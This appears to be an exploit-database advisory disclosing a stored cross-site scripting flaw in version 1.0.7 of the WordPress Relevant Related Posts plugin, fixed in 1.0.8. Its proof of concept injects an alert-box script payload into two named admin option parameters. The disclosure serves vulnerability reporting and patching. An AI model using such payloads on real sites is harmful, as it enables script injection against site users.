WordPress Relevant Related Posts 1.0.7 Cross Site Scripting Vulnerability

2015-12-18T00:00:00
ID 1337DAY-ID-24750
Type zdt
Reporter Madhu Akula
Modified 2015-12-18T00:00:00

Description

WordPress Relevant Related Posts plugin version 1.0.7 suffers from a cross site scripting vulnerability.

                                        
                                            WordPress Relevant Related Posts 1.0.7 Cross Site Scripting

Plugin Name : Relevant Related Posts Plugin
 
Effected Version : 1.0.7 (and most probably lower version's if any)
 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Madhu Akula
 

 
Technical Details
 
Minimum Level of Access Required : Administrator
 
PoC - (Proof of Concept) :
 
The following fields put the payload as below
 
http://localhost/wp-admin/admin.php?page=related-posts-plugin.php
 
rltdpstsplgn_options[head] = “><script>alert(1)</script>
rltdpstsplgn_options[no_posts] = “><script>alert(2)</script>
 
 
Vulnerable Parameter : rltdpstsplgn_options[head], rltdpstsplgn_options[no_posts]
 
Type of XSS : Stored
 
Fixed in : 1.0.8
 
http://wordpress.org/plugins/relevant/changelog/

#  0day.today [2018-03-19]  #